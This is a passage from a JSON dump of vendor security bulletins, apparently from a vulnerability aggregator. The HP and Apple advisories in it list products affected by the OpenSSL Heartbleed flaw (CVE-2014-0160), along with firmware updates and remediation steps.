Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNRuDoACgkQ4B86/C0qfVmexQCcD1Lmts47FOGN0Menqko8xYif\r\nRn0An37XtrV5oSdnUBMK4ppE0n35P/XD\r\n=GtcJ\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU02994 rev.2 - HP BladeSystem c-Class Onboard Administrator (OA) running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30510", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30510", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04268240\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04268240\r\nVersion: 1\r\n\r\nHPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL,\r\nRemote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Insight\r\nControl server migration running OpenSSL. 
This is the OpenSSL vulnerability\r\nknown as "Heartbleed" which could be exploited remotely resulting in\r\ndisclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101543\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Insight Control server migration v7.3 and v7.3.1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP is actively working to address this vulnerability for the impacted\r\nversions of HP Insight Control server migration. This bulletin will be\r\nrevised when the software updates are released.\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhgW8ACgkQ4B86/C0qfVkSPACg6AXj97HaBw46iPIin1VL7YnW\r\nnoQAoJbFj4yAe286o14VdL81VuF3D3xb\r\n=G4bD\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03029 rev.1 - HP Insight Control Server Migration running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30519", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30519", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04272043\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04272043\r\nVersion: 1\r\n\r\nHPSBPI03031 rev.1 - HP Officejet Pro X Printers, Certain Officejet Pro\r\nPrinters, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP Officejet Pro X\r\nprinters and in certain Officejet Pro printers running OpenSSL. 
This is the\r\nOpenSSL vulnerability known as "Heartbleed" (CVE-2014-0160) which could be\r\nexploited remotely resulting in disclosure of information.\r\n\r\nReferences: CVE-2014-0160, SSRT101548\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nPlease refer to the RESOLUTION\r\n below for a list of impacted products.\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\nHP has provided firmware updates that address this vulnerability. Please see\r\nthe table below. To obtain the updated firmware, follow the below steps to\r\nobtain the firmware Update.\r\n\r\nObtain the firmware update from www.hp.com/go/support\r\n\r\nSelect "Drivers & Downloads".\r\nEnter the product name listed in the table below into the search field.\r\nClick on "Go".\r\nClick on the appropriate product.\r\nUnder "Select operating system" select any Windows operating system from the\r\nlist.\r\nSelect the appropriate firmware update under "Firmware".\r\n\r\nProduct Name\r\n Model Number\r\n Firmware Revision\r\n\r\nHP Officejet Pro X451dn Printer\r\n CN459A\r\n BNP1CN1409BR\r\n\r\nHP Officejet Pro X451dw Printer\r\n CN463A\r\n BWP1CN1409BR\r\n\r\nHP Officejet Pro X551dw Printer\r\n CV037A\r\n BZP1CN1409BR\r\n\r\nHP Officejet Pro X476dn Multifunction Printer\r\n CN460A\r\n LNP1CN1409BR\r\n\r\nHP Officejet Pro X476dw Multifunction Printer\r\n CN461A\r\n LWP1CN1409BR\r\n\r\nHP Officejet Pro X576dw Multifunction Printer\r\n CN598A\r\n LZP1CN1409BR\r\n\r\nHP Officejet Pro 276dw Multifunction Printer\r\n CR770A\r\n FRP1CN1416BR\r\n\r\nHP Officejet Pro 251dw Printer\r\n CV136A\r\n EVP1CN1416BR\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird 
Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. 
The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhXb4ACgkQ4B86/C0qfVndrACggnOpxKlt7khtZKKXc5Q/q6uJ\r\nACYAnRQh1aMRra+LPUo9vSwpILIrbS/u\r\n=krj5\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBPI03031 rev.1 - HP Officejet Pro X Printers, Certain Officejet Pro Printers, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30512", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30512", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04267775\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04267775\r\nVersion: 1\r\n\r\nHPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of\r\nInformation\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-25\r\nLast Updated: 2014-04-25\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified in HP 
Diagnostics\r\nrunning OpenSSL. OpenSSL is a 3rd party product that is embedded with some of\r\nHP Software products. This bulletin objective is to notify HP Software\r\ncustomers about products affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101539)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Diagnostics 9.23 and 9.23 IP1\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nCustomers should download the security remediation guidelines from the\r\nfollowing link:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00868126\r\n\r\nHP recommends completing the following action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. 
To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 25 April 2014 - Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. For other issues about\r\nthe content of this Security Bulletin, send e-mail to security-alert@hp.com.\r\n\r\nReport: To report a potential security vulnerability with any HP supported\r\nproduct, send Email to: security-alert@hp.com\r\n\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletin\r\nalerts via Email:\r\nhttp://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins\r\n\r\nSecurity Bulletin Archive: A list of recently released Security Bulletins is\r\navailable here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/\r\n\r\nSoftware Product Category: The Software Product Category is represented in\r\nthe title by the two characters following HPSB.\r\n\r\n3C = 3COM\r\n3P = 3rd Party Software\r\nGN = HP General Software\r\nHF = HP Hardware and Firmware\r\nMP = MPE/iX\r\nMU = Multi-Platform Software\r\nNS = NonStop Servers\r\nOV = OpenVMS\r\nPI = Printing and Imaging\r\nPV = ProCurve\r\nST = Storage Software\r\nTU = Tru64 UNIX\r\nUX = HP-UX\r\n\r\nCopyright 2014 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors\r\nor omissions contained herein. The information provided is provided "as is"\r\nwithout warranty of any kind. 
To the extent permitted by law, neither HP or\r\nits affiliates, subcontractors or suppliers will be liable for\r\nincidental,special or consequential damages including downtime cost; lost\r\nprofits; damages relating to the procurement of substitute products or\r\nservices; or damages for loss of data, or software restoration. The\r\ninformation in this document is subject to change without notice.\r\nHewlett-Packard Company and the names of Hewlett-Packard products referenced\r\nherein are trademarks of Hewlett-Packard Company in the United States and\r\nother countries. Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNavpgACgkQ4B86/C0qfVkj7QCg0J8cRJO9r8wa9JVIHcIZm0Qx\r\nca0AoO/PCAVZUJX7izSERN0LqreLU3ok\r\n=CUx8\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-01T00:00:00", "title": "[security bulletin] HPSBMU03025 rev.1 - HP Diagnostics running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-01T00:00:00", "id": "SECURITYVULNS:DOC:30498", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30498", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04248997\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04248997\r\nVersion: 1\r\n\r\nHPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL\r\nVulnerability, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon 
as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-16\r\nLast Updated: 2014-04-16\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nThe Heartbleed vulnerability was detected in specific OpenSSL versions.\r\nOpenSSL is a 3rd party product that is embedded with some of HP Software\r\nproducts. This bulletin objective is to notify HP Software customers about\r\nproducts affected by the Heartbleed vulnerability.\r\n\r\nNOTE: The Heartbleed vulnerability (CVE-2014-0160) is a vulnerability found\r\nin the OpenSSL cryptographic software library. This weakness potentially\r\nallows disclosure of information that is normally protected by the SSL/TLS\r\nprotocol. The impacted products in the list below are vulnerable due to\r\nembedding OpenSSL standard release software.\r\n\r\nReferences: CVE-2014-0160 (SSRT101516)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nService Manager, 9.32 (including all patches), 9.33 (GA,9.33 p1, 9.33-p1-rev1\r\n& 9.33.p2)\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nNOTE: OpenSSL is an external product embedded in HP products.\r\n\r\nSecurity guidelines for remediation can be downloaded from the following\r\nlink:\r\n\r\nhttp://support.openview.hp.com/selfsolve/document/KM00843525\r\n\r\nHP recommends following the Service Manager guidelines and completing the\r\nfollowing action items:\r\n\r\nRevocation of the old key pairs that were just superseded\r\nChanging potentially affected passwords\r\nInvalidating all session keys and cookies\r\n\r\nBulletin Applicability:\r\n\r\nThis 
bulletin applies to each OpenSSL component that is embedded within the\r\nHP products listed in the security bulletin. The bulletin does not apply to\r\nany other 3rd party application (e.g. operating system, web server, or\r\napplication server) that may be required to be installed by the customer\r\naccording instructions in the product install guide. To learn more about HP\r\nSoftware Incident Response, please visit http://www8.hp.com/us/en/software-so\r\nlutions/enterprise-software-security-center/response-center.html . Software\r\nupdates are available from HP Software Support Online at\r\nhttp://support.openview.hp.com/downloads.jsp\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 16 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.13 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNPHNsACgkQ4B86/C0qfVmMwQCgi9CnzzUd9g7tjfv9xFQ32BSs\r\nWG0AoPOEoiZs9gYLWbaBwacUhVaC5mGV\r\n=oGCq\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-04-20T00:00:00", "title": "[security bulletin] HPSBGN03008 rev.1 - HP Software Service Manager, "HeartBleed" OpenSSL Vulnerability, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-04-20T00:00:00", "id": "SECURITYVULNS:DOC:30473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30473", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04271396\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04271396\r\nVersion: 1\r\n\r\nHPSBMU03030 rev.1 - HP Service Pack for ProLiant (SPP) Bundled Software\r\nrunning OpenSSL, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-30\r\nLast Updated: 2014-04-30\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential security vulnerability has been identified with HP Service Pack\r\nfor ProLiant (SPP) bundled software running OpenSSL. 
This is the OpenSSL\r\nvulnerability known as "Heartbleed" which could be exploited remotely\r\nresulting in disclosure of information.\r\n\r\nNote: additional information regarding the OpenSSL "Heartbleed" vulnerability\r\nconcerning HP Servers products is available at the following HP Customer\r\nNotice:\r\n\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n\r\na-c04239413\r\n\r\nReferences: CVE-2014-0160, SSRT101546\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP Service Pack for ProLiant (SPP) impacted software products and versions\r\n\r\nHP Onboard Administrator (OA) v4.11 and v4.20\r\n\r\nHP System Management Homepage (SMH) v7.1.2, v7.2, v7.2.1, v7.2.2, v7.3,\r\nv7.3.1 for Linux and Windows\r\n\r\nHP Integrated Lights-Out 2 (iLO 2) version v2.23 and earlier\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n\r\nHP Smart Update Manager (SUM) v6.0.0 through v6.3.0\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2014-0160 (AV:N/AC:L/Au:N/C:P/I:N/A:N) 5.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nRESOLUTION\r\n\r\nHP has addressed this vulnerability for the impacted HP Service Pack for\r\nProLiant (SPP) bundled software in the following updates and/or HP Security\r\nBulletins.\r\n\r\nHP SPP Component\r\n Update Version or HP Security Bulletin\r\n Software Update or Security Bulletin Location\r\n\r\nHP Service Pack for ProLiant (SPP)\r\n Version:2014.02.0 (B)\r\n 
http://h20566.www2.hp.com/portal/site/hpsc/template.PAGE/public/psi/swdDetai\r\nls/?javax.portlet.begCacheTok=com.vignette.cachetoken&javax.portlet.endCacheT\r\nok=com.vignette.cachetoken&javax.portlet.prp_bd9b6997fbc7fc515f4cf4626f5c8d01\r\n=wsrp-navigationalState%3Didx%253D%257CswItem%253DMTX_335408c4a064478d934e942\r\n3c0%257CswEnvOID%253D4024%257CitemLocale%253D%257CswLang%253D%257Cmode%253D5%\r\n257Caction%253DdriverDocument&javax.portlet.tpst=bd9b6997fbc7fc515f4cf4626f5c\r\n8d01&sp4ts.oid=5104019&ac.admitted=1395175158147.876444892.199480143\r\n\r\nHP Onboard Administrator (OA)\r\n HPSBMU02994\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04236062\r\n\r\nHP System Management Homepage (SMH)\r\n HPSBMU02998\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239372\r\n\r\nHP Integrated Lights-Out 2 (iLO 2)\r\n HPSBMU03006\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04244787\r\n\r\nHP BladeSystem c-Class Virtual Connect Firmware, Ethernet plus 4/8Gb 20-port\r\nand 8Gb 24-port FC Edition Component for Windows v4.10 and v4.20 Smart\r\nComponents installer\r\n HPSBMU03032\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04272594\r\n\r\nHP Smart Update Manager (SUM)\r\n HPSBMU02997\r\n https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_\r\nna-c04239375\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 30 April 2014 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be\r\ninstalled on systems running HP software products should be applied in\r\naccordance with the customer's patch management policy.\r\n\r\nSupport: For issues about implementing the recommendations of this Security\r\nBulletin, contact normal HP Services support channel. 
Other product and company names mentioned herein may be\r\ntrademarks of their respective owners.\r\n\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v2.0.19 (GNU/Linux)\r\n\r\niEYEARECAAYFAlNhfjwACgkQ4B86/C0qfVkhMgCg+QcqGt6ad3u/sMCYkEDR9Su6\r\nLjYAn0xSUE51gcQ8Oap+n5GKA8ouoARE\r\n=xVqC\r\n-----END PGP SIGNATURE-----\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-02T00:00:00", "title": "[security bulletin] HPSBMU03030 rev.1 - HP Service Pack for ProLiant (SPP) Bundled Software running OpenSSL, Remote Disclosure of Information", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-02T00:00:00", "id": "SECURITYVULNS:DOC:30523", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30523", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nAPPLE-SA-2014-04-22-4 AirPort Base Station Firmware Update 7.7.3\r\n\r\nAirPort Base Station Firmware Update 7.7.3 is now available and\r\naddresses the following:\r\n\r\nAvailable for:\r\nAirPort Extreme and AirPort Time Capsule base stations with 802.11ac\r\nImpact: An attacker in a privileged network position may obtain\r\nmemory contents\r\nDescription: An out-of-bounds read issue existed in the OpenSSL\r\nlibrary when handling TLS heartbeat extension packets. An attacker in\r\na privileged network position could obtain information from process\r\nmemory. This issue was addressed through additional bounds checking.\r\nOnly AirPort Extreme and AirPort Time Capsule base stations with\r\n802.11ac are affected, and only if they have Back to My Mac or Send\r\nDiagnostics enabled. 
Other AirPort base stations are not impacted by\r\nthis issue.\r\nCVE-ID\r\nCVE-2014-0160 : Riku, Antti, and Matti of Codenomicon and Neel Mehta\r\nof Google Security\r\n\r\n\r\nInstallation note for Firmware version 7.7.3\r\n\r\nFirmware version 7.7.3 is installed on AirPort Extreme or AirPort\r\nTime Capsule base stations with 802.11ac using AirPort Utility for\r\nMac or iOS.\r\n\r\nUse AirPort Utility 6.3.1 or later on OS X, or AirPort Utility 1.3.1\r\nor later on iOS to upgrade to Firmware version 7.7.3.\r\n\r\nAirPort Utility for Mac is a free download from\r\nhttp://www.apple.com/support/downloads/ and AirPort Utility for iOS\r\nis a free download from the App Store.\r\n\r\nInformation will also be posted to the Apple Security Updates\r\nweb site: http://support.apple.com/kb/HT1222\r\n\r\nThis message is signed with Apple's Product Security PGP key,\r\nand details are available at:\r\nhttps://www.apple.com/support/security/pgp/\r\n\r\n", "edition": 1, "cvss3": {}, "published": "2014-05-04T00:00:00", "title": "APPLE-SA-2014-04-22-4 AirPort
Base Station Firmware Update 7.7.3", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2014-0160"], "modified": "2014-05-04T00:00:00", "id": "SECURITYVULNS:DOC:30553", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30553", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-08-31T11:10:51", "description": "\r\n\r\n-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nNote: the current version of the following document is available here:\r\nhttps://h20564.www2.hp.com/portal/site/hpsc/public/kb/\r\ndocDisplay?docId=emr_na-c04262495\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c04262495\r\nVersion: 1\r\n\r\nHPSBPI03014 rev.1 - HP LaserJet Pro MFP Printers, HP Color LaserJet Pro MFP\r\nPrinters, Remote Disclosure of Information\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as\r\nsoon as possible.\r\n\r\nRelease Date: 2014-04-24\r\nLast Updated: 2014-04-24\r\n\r\nPotential Security Impact: Remote disclosure of information\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nA potential vulnerability exists in HP LaserJet Pro MFP Printers, HP Color\r\nLaserJet Pro MFP Printers. 
